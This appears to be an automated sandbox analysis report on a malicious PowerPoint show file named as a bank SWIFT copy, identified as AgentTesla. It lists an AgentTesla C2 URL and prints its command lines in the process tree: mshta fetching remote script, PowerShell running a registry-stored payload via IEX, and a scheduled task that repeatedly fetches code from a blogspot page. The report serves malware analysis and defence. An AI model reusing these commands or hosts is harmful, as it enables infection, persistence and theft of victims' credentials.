Analysis

  • max time kernel
    116s
  • max time network
    131s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-01-2021 09:30

General

  • Target

    BankSwiftCopyUSD95000.pps

  • Size

    99KB

  • MD5

    7f0b415d0b7a76530b2f510a910811e5

  • SHA1

    480594ad26c91dd9d719c80334285375540dc83e

  • SHA256

    8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019

  • SHA512

    d9b3320b51f390a6f75e7e3102044557e6476103c94ec4451819b78b4503f8018fee7ce8f70657473b310b14b752935fac2b7e5caaeb318e09a9af317701d8f4

Malware Config

Extracted

Family

agenttesla

C2

http://64.188.18.218/webpanel-st/inc/6295ae82aa2db6.php

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • AgentTesla Payload 2 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\BankSwiftCopyUSD95000.pps" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:980
    • C:\Windows\SYSTEM32\ping.exe
      ping.exe
      2⤵
      • Process spawned unexpected child process
      • Runs ping.exe
      PID:2252
    • C:\Windows\SYSTEM32\mshta.exe
      mshta http://1230948%1230948%1230948%[email protected]/dbgghasdnasdjasgdakgsdhv
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3120
      • C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
        "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).meather)|IEX
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2696
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
          • Drops file in Drivers directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2988
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""lunkicharkhi"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta https://randikhanaekminar.blogspot.com/p/st2.html""\"", 0 : window.close"\")
        3⤵
        • Creates scheduled task(s)
        PID:2896
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im winword.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1620
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im EXCEL.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1276
    • C:\Windows\SYSTEM32\ping.exe
      ping.exe
      2⤵
      • Process spawned unexpected child process
      • Runs ping.exe
      PID:3228

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/980-6-0x00007FFA11E00000-0x00007FFA139DD000-memory.dmp

    Filesize

    27.9MB

  • memory/980-2-0x00007FFA14480000-0x00007FFA14AB7000-memory.dmp

    Filesize

    6.2MB

  • memory/1276-12-0x0000000000000000-mapping.dmp

  • memory/1620-10-0x0000000000000000-mapping.dmp

  • memory/2252-3-0x0000000000000000-mapping.dmp

  • memory/2696-18-0x0000000008350000-0x0000000008351000-memory.dmp

    Filesize

    4KB

  • memory/2696-22-0x0000000009A50000-0x0000000009A51000-memory.dmp

    Filesize

    4KB

  • memory/2696-29-0x0000000004DD0000-0x0000000004DD8000-memory.dmp

    Filesize

    32KB

  • memory/2696-7-0x0000000000000000-mapping.dmp

  • memory/2696-11-0x0000000073390000-0x0000000073A7E000-memory.dmp

    Filesize

    6.9MB

  • memory/2696-28-0x0000000007550000-0x0000000007560000-memory.dmp

    Filesize

    64KB

  • memory/2696-13-0x00000000072B0000-0x00000000072B1000-memory.dmp

    Filesize

    4KB

  • memory/2696-14-0x0000000007920000-0x0000000007921000-memory.dmp

    Filesize

    4KB

  • memory/2696-15-0x0000000007890000-0x0000000007891000-memory.dmp

    Filesize

    4KB

  • memory/2696-16-0x0000000007FC0000-0x0000000007FC1000-memory.dmp

    Filesize

    4KB

  • memory/2696-17-0x00000000082E0000-0x00000000082E1000-memory.dmp

    Filesize

    4KB

  • memory/2696-27-0x000000000B730000-0x000000000B731000-memory.dmp

    Filesize

    4KB

  • memory/2696-19-0x0000000008700000-0x0000000008701000-memory.dmp

    Filesize

    4KB

  • memory/2696-20-0x0000000008C40000-0x0000000008C41000-memory.dmp

    Filesize

    4KB

  • memory/2696-21-0x0000000009690000-0x0000000009691000-memory.dmp

    Filesize

    4KB

  • memory/2696-26-0x000000000ABB0000-0x000000000ABB1000-memory.dmp

    Filesize

    4KB

  • memory/2696-23-0x000000000A610000-0x000000000A611000-memory.dmp

    Filesize

    4KB

  • memory/2696-24-0x000000000A590000-0x000000000A591000-memory.dmp

    Filesize

    4KB

  • memory/2696-25-0x000000000A5E0000-0x000000000A5E1000-memory.dmp

    Filesize

    4KB

  • memory/2824-9-0x0000000000000000-mapping.dmp

  • memory/2896-8-0x0000000000000000-mapping.dmp

  • memory/2988-30-0x0000000000400000-0x000000000043C000-memory.dmp

    Filesize

    240KB

  • memory/2988-31-0x00000000004376FE-mapping.dmp

  • memory/2988-32-0x0000000073390000-0x0000000073A7E000-memory.dmp

    Filesize

    6.9MB

  • memory/2988-36-0x00000000058F0000-0x00000000058F1000-memory.dmp

    Filesize

    4KB

  • memory/2988-37-0x0000000005890000-0x0000000005891000-memory.dmp

    Filesize

    4KB

  • memory/2988-39-0x0000000006C90000-0x0000000006C91000-memory.dmp

    Filesize

    4KB

  • memory/2988-40-0x0000000001660000-0x0000000001661000-memory.dmp

    Filesize

    4KB

  • memory/3120-4-0x0000000000000000-mapping.dmp

  • memory/3228-5-0x0000000000000000-mapping.dmp